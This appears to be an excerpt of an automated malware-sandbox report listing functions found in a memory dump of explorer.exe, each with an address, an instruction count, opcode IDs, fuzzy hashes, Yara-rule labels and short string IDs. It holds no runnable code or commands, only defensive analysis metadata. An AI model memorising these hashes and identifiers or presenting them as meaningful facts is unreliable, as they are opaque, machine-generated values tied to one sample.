                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f71c6bbaea65ce4dfe34cb0ece41a96112ddd2720be2b13aca4e69f9fd43fb2f
                                  • Instruction ID: 6517e1b23ad2e33000d1fa4caf650b9f26cc1b5c1c57c921b22cf61e3984111d
                                  • Opcode Fuzzy Hash: f71c6bbaea65ce4dfe34cb0ece41a96112ddd2720be2b13aca4e69f9fd43fb2f
                                  • Instruction Fuzzy Hash: 6E01F571F0E95E4FE771EBA8C4681B97BD2EF18300F0644B6D45CC70B1EE24A5448361
                                  Function 00007FFD9BAA0610 Relevance: .0, Instructions: 42COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1ef8f8347bfb13ab46b84d136021763385eb437dc079f3a99af4081001d98ba2
                                  • Instruction ID: 4051dac16efcd8605562102cc8285655c726e1cfcf9e6dc923fa521c6db7ed16
                                  • Opcode Fuzzy Hash: 1ef8f8347bfb13ab46b84d136021763385eb437dc079f3a99af4081001d98ba2
                                  • Instruction Fuzzy Hash: 13018630A19A0E8AEB59EBA4C5685BDB3E1FF1C305F11447EE41EC21E5DF79A650CB10
                                  Function 00007FFD9BAA05D0 Relevance: .0, Instructions: 39COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fd3ef93a0fdf53410b71620a4c73c60972a94ff899b4b44d354ec03a145949bf
                                  • Instruction ID: e02c4bf09b18b0f7cb7fa33c738020a2b52e2425bff4fb26336fbefe0d183faf
                                  • Opcode Fuzzy Hash: fd3ef93a0fdf53410b71620a4c73c60972a94ff899b4b44d354ec03a145949bf
                                  • Instruction Fuzzy Hash: A8F0FC30A0A54E9FDB94EF64C4255FA7791EF26309F11047AE81DC20D1CE75A550CB40
                                  Function 00007FFD9BAA246A Relevance: .0, Instructions: 38COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c3630bd8883da8ead8f13b585d9c148094ca6e65ebcf326ec2877f0b9e2c05bb
                                  • Instruction ID: fd20151c02923c7102661178b649b41ad8e4fe7268b3890ec8b0e93734bf059e
                                  • Opcode Fuzzy Hash: c3630bd8883da8ead8f13b585d9c148094ca6e65ebcf326ec2877f0b9e2c05bb
                                  • Instruction Fuzzy Hash: E701CC30A4A61ECBEBB4DB90C9647E873B6FB54700F1141B9C40ED21A1DEB82A85DB50
                                  Function 00007FFD9BAA287D Relevance: .0, Instructions: 33COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dd28f551f316278ae6e9dcb654c2be8e436376a8594a9fc4dfac0cfe837a8a41
                                  • Instruction ID: 2747e9f2e816f354a6ffb1684334afe5a4f484b28a875022fdb14e7e10a3e6a8
                                  • Opcode Fuzzy Hash: dd28f551f316278ae6e9dcb654c2be8e436376a8594a9fc4dfac0cfe837a8a41
                                  • Instruction Fuzzy Hash: 55F02430A0E78E8FEB689FA084241F97BA0FF19300F4200BEF818C10E1DB78E5608700
                                  Function 00007FFD9BAA2818 Relevance: .0, Instructions: 28COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b50f3dd5efa3c454e214c0078cd42e508e26655da64a18f689df04552f85a604
                                  • Instruction ID: 7770cda15a110efcfb0c024a978a19edbae02c9f6f303fa457ba2481a3416625
                                  • Opcode Fuzzy Hash: b50f3dd5efa3c454e214c0078cd42e508e26655da64a18f689df04552f85a604
                                  • Instruction Fuzzy Hash: 0BF0A73051A74E8BEB68AFA4C5651F97760FF48304F41047EF81DC10E5DB789264C640
                                  Function 00007FFD9BAA0608 Relevance: .0, Instructions: 28COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 96fd5ec407d43a915f23aac49a8f12a9eb21738333262abdd64377b19d55f1b7
                                  • Instruction ID: b2195e3622f068280cd16b9ddaa178490fbaaf073e628a7e60bb454996746d41
                                  • Opcode Fuzzy Hash: 96fd5ec407d43a915f23aac49a8f12a9eb21738333262abdd64377b19d55f1b7
                                  • Instruction Fuzzy Hash: F0F06530A1A70E8BEB68AFB4C5252BDB2A5FF58305F41487AF81DC11E4DF78A264C650
                                  Function 00007FFD9BAA5C06 Relevance: .0, Instructions: 24COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d8611139f153c53c4eb751b61a7e00d8b8c24fac7b03b308f9bb26b0e778ac99
                                  • Instruction ID: 4ce317d30c98bb0dc58068407c23fc642fddfa9f18320ce00b4403b3018ba45a
                                  • Opcode Fuzzy Hash: d8611139f153c53c4eb751b61a7e00d8b8c24fac7b03b308f9bb26b0e778ac99
                                  • Instruction Fuzzy Hash: 11F0D4B0D0951D8EDBA4EF088854BE9B7B1FB59300F1000EEC10DE32A1DA305A80CF14
                                  Function 00007FFD9BAAB72D Relevance: .0, Instructions: 12COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c34fee35a98ab53ae0e6f4addbaeb48680e078f4b4b092ed11f9359e23bc2b69
                                  • Instruction ID: 55b18844fd76ebbb2d45b06b3393a0293545ca917def45e3641f54bf824dca10
                                  • Opcode Fuzzy Hash: c34fee35a98ab53ae0e6f4addbaeb48680e078f4b4b092ed11f9359e23bc2b69
                                  • Instruction Fuzzy Hash: 20D09230A1995E8AEB65EB54C850AEDB261BF18344F1047A6D80DE619ACA74AB808B40

                                  Non-executed Functions

                                  Function 00007FFD9BAAEFE7 Relevance: 10.1, Strings: 8, Instructions: 127COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: '$*$:$J$\$]$`$i
                                  • API String ID: 0-586176889
                                  • Opcode ID: 8ed5fc749c68d74bec66f1a7e2ba3e7d2d2cfaee845989659e4325753bc77b80
                                  • Instruction ID: a48257745337c9a97c1d2d8fe71356af5c3b554ab532a1da87c65ebae0f17501
                                  • Opcode Fuzzy Hash: 8ed5fc749c68d74bec66f1a7e2ba3e7d2d2cfaee845989659e4325753bc77b80
                                  • Instruction Fuzzy Hash: 1251EA70E0966D8FDB64DFA4C8A57A9B7B2BF54301F1041E9D00DA7291DB78AE80CF51
                                  Function 00007FFD9BAAE913 Relevance: 7.6, Strings: 6, Instructions: 106COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: "$'$*$J$\$]
                                  • API String ID: 0-588965342
                                  • Opcode ID: b639ddda7bfb0771092fd166c88da493c4addc214df66023f799ec146299d03a
                                  • Instruction ID: 9447a848c0a9794ca44840c5db8c0dcf766fcc1df59cee5e7a2851a2728554d0
                                  • Opcode Fuzzy Hash: b639ddda7bfb0771092fd166c88da493c4addc214df66023f799ec146299d03a
                                  • Instruction Fuzzy Hash: 1941D670E0966D8FDB64DF94C8A97BEB7B2BB54301F1001EAD40DA3291DB785A80CF51
                                  Function 00007FFD9BAB1E50 Relevance: 5.2, Strings: 4, Instructions: 150COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ,$6$B$L
                                  • API String ID: 0-1653800205
                                  • Opcode ID: 2533b4249652f414f424af60fc1984dcdd62488a73e30373a98a64cf209bfcdc
                                  • Instruction ID: 5b1edb7f867e8b12d57fe47663f5507f35bc9dc2ef8d0458cf00f9dd5b1fa763
                                  • Opcode Fuzzy Hash: 2533b4249652f414f424af60fc1984dcdd62488a73e30373a98a64cf209bfcdc
                                  • Instruction Fuzzy Hash: 2851B670E0561D8FDBA4EFA8C4657B8B7F2EF59300F1141A9D41DE72A2DA786A81CF10
                                  Function 00007FFD9BAB118F Relevance: 5.1, Strings: 4, Instructions: 92COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $+$[${
                                  • API String ID: 0-24842237
                                  • Opcode ID: 10c6528d05ea9a5e8c761456c678a29d278f6fbda985cb3388243d79fc7ea59e
                                  • Instruction ID: c4029fc885cd25bae0c13dbc38ca275a74667587fdca29f9851b1aa24e3335ef
                                  • Opcode Fuzzy Hash: 10c6528d05ea9a5e8c761456c678a29d278f6fbda985cb3388243d79fc7ea59e
                                  • Instruction Fuzzy Hash: 0E41D670E1922DCEEB68DF94D8A47FDB6B1BF14300F1145BED01AA6291CB785A84DF11
                                  Function 00007FFD9BAAF364 Relevance: 5.1, Strings: 4, Instructions: 65COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 1$X$\${
                                  • API String ID: 0-2079265821
                                  • Opcode ID: 03cdd2702da4c210f5b6680c66c4bc40a817fe7e497d7e2334e8c86ebacfbc20
                                  • Instruction ID: 75767e7409760662a4f88774a86908897c066b62027e0776c46bf4e424a254ea
                                  • Opcode Fuzzy Hash: 03cdd2702da4c210f5b6680c66c4bc40a817fe7e497d7e2334e8c86ebacfbc20
                                  • Instruction Fuzzy Hash: 1431C930A0966D8FEBB9DF94C8A47A9B3B6FB54341F1141B9D00DA3294CB746B80CF50
                                  Function 00007FFD9BAAF3AB Relevance: 5.1, Strings: 4, Instructions: 56COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: :$`$a$i
                                  • API String ID: 0-934523947
                                  • Opcode ID: 6567ed2fc8d097dbd71c0673d248cdc3aaf72cfb8e1a1e992853a0e5b3485507
                                  • Instruction ID: 1d794d4e42abcedd876993c51e1b87bb18cb7cb8eb0c10f18ce21f4ddc07ddf4
                                  • Opcode Fuzzy Hash: 6567ed2fc8d097dbd71c0673d248cdc3aaf72cfb8e1a1e992853a0e5b3485507
                                  • Instruction Fuzzy Hash: DC21E930E0926D8FEB68DF94C8A47A9B3B2FF14305F2041E9D00D97291CB796A94CF51
                                  Function 00007FFD9BAAFC21 Relevance: 5.0, Strings: 4, Instructions: 41COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 9$d$j${
                                  • API String ID: 0-204969695
                                  • Opcode ID: f304a2cb661420213d39def3e5da6422916390c5b73377ee298b4ff82bf48329
                                  • Instruction ID: 54a47d367181251c1a05aa2a01d7d83d39918f7550df2f5a811c544115ff2fd8
                                  • Opcode Fuzzy Hash: f304a2cb661420213d39def3e5da6422916390c5b73377ee298b4ff82bf48329
                                  • Instruction Fuzzy Hash: FB11E970A0526E8EEB749F90C8A47F9B6B2AB54301F1141FAC009A6290CFB85B84DF51